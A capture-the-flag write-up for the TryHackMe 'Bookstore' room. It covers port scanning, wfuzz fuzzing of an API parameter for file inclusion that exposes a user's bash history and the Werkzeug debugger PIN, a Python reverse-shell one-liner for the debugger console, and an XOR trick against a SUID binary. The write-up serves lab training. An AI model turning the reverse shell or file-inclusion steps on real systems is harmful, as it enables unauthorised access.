mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-29 07:00:31 +00:00
144 lines
3.9 KiB
Markdown
144 lines
3.9 KiB
Markdown
|
# TryHackMe-Bookstore
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.117.123
|
||
|
Host is up (0.15s latency).
|
||
|
Not shown: 65532 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)
|
||
|
| 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)
|
||
|
|_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)
|
||
|
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
||
|
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
||
|
|_http-title: Book Store
|
||
|
5000/tcp open http Werkzeug httpd 0.14.1 (Python 3.6.9)
|
||
|
| http-robots.txt: 1 disallowed entry
|
||
|
|_/api </p>
|
||
|
|_http-title: Home
|
||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||
|
Nmap done: 1 IP address (1 host up) scanned in 1323.85 seconds
|
||
|
|
||
|
```
|
||
|
|
||
|
## PORT 80
|
||
|
|
||
|
<img src="https://imgur.com/TTzO2wr.png"/>
|
||
|
|
||
|
## PORT 5000
|
||
|
|
||
|
<img src="https://imgur.com/NDu92Ye.png"/>
|
||
|
|
||
|
As we saw from nmap scan that there is a `robots.txt` file at port 5000
|
||
|
|
||
|
<img src="https://imgur.com/dI8y0tJ.png"/>
|
||
|
|
||
|
<img src="https://imgur.com/4X8nlfw.png"/>
|
||
|
|
||
|
Running gobuster on this port we see a console a type of debugger
|
||
|
|
||
|
<img src="https://imgur.com/JhylVwm.png"/>
|
||
|
|
||
|
<img src="https://imgur.com/DRbVY4g.png"/>
|
||
|
|
||
|
But it's asking for a PIN.
|
||
|
|
||
|
I found a metasploit exploit for it but it didn't worked
|
||
|
|
||
|
<img src="https://imgur.com/oGgxBQO.png"/>
|
||
|
|
||
|
Going back to port 80 and then looking at the login page source we find that PIN is in bash history file of user `sid`.
|
||
|
|
||
|
We know there are two versions of api v1 and v2 , v1 is likely to be vulnerable to LFI so let's choose the endpoint that has a parameter
|
||
|
|
||
|
`/api/v2/resources/books?id=1`
|
||
|
|
||
|
Change this to
|
||
|
|
||
|
`/api/v1/resources/books?id=.bash_history`
|
||
|
|
||
|
then put it in `wfuzz`
|
||
|
|
||
|
### Wfuzz
|
||
|
|
||
|
```
|
||
|
wfuzz -u http://10.10.117.123:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404
|
||
|
```
|
||
|
|
||
|
Here
|
||
|
|
||
|
`-u` the host with the api-endpoint
|
||
|
`?FUZZ` here ? is before the paramter and "FUZZ" is the location where we want to find the paramter
|
||
|
`--hc` is telling to hide status codes like 404 which is not found
|
||
|
|
||
|
<img src="https://imgur.com/xh9A7H1.png"/>
|
||
|
|
||
|
<img src="https://imgur.com/TJWxLdg.png"/>
|
||
|
|
||
|
```
|
||
|
cd /home/sid whoami export WERKZEUG_DEBUG_PIN=123-321-135 echo $WERKZEUG_DEBUG_PIN python3 /home/sid/api.py ls exit
|
||
|
```
|
||
|
|
||
|
<img src="https://imgur.com/AB6oKEG.png"/>
|
||
|
|
||
|
And now we can interact with the debugger also in order to get into the box we have to paste a reverse shell there
|
||
|
|
||
|
```
|
||
|
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.209.100",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
|
||
|
|
||
|
```
|
||
|
Paste this on to the debugger and set your netcat listener
|
||
|
|
||
|
<img src="https://imgur.com/sbTCu2l.png"/>
|
||
|
|
||
|
|
||
|
## Privlege Escalation
|
||
|
|
||
|
|
||
|
<img src="https://imgur.com/VZSpKHD.png"/>
|
||
|
|
||
|
We see a binary which has a SUID on it so it can run as a root but we need to figure out what it is doing and how we can execute it properly to get root
|
||
|
|
||
|
|
||
|
On analyzing the binary with `ghidra`
|
||
|
|
||
|
<img src="https://imgur.com/F16KKwC.png"/>
|
||
|
|
||
|
? ----> local_1c is the number we are going to input
|
||
|
4374 ---->
|
||
|
23987 ---> local_18
|
||
|
|
||
|
local_14 has to be this number 1573724660
|
||
|
|
||
|
I have converted those hexadecimal number to decimal to get a better understanding
|
||
|
|
||
|
|
||
|
`local_14 = local_1c ^ 4374 ^ local_18`
|
||
|
|
||
|
|
||
|
What's happening in here is that these three values are getting through and exclusive OR operator `^` .We don't know what value we put inorder to get `1573724660`.
|
||
|
|
||
|
So I'll convert hex values to decimal and XOR between them
|
||
|
|
||
|
```
|
||
|
1573724660 ^ 4374 ^ local_18
|
||
|
|
||
|
1573724660 ^ 4374 ^ 23987
|
||
|
|
||
|
1573724660 ^ 19621
|
||
|
|
||
|
1573743953
|
||
|
|
||
|
```
|
||
|
<img src="https://imgur.com/Bk3Svt9.png"/>
|
||
|
|
||
|
Let's try the final result we got
|
||
|
|
||
|
<img src="https://imgur.com/8AdgZpm.png"/>
|
||
|
|
||
|
And we are root !
|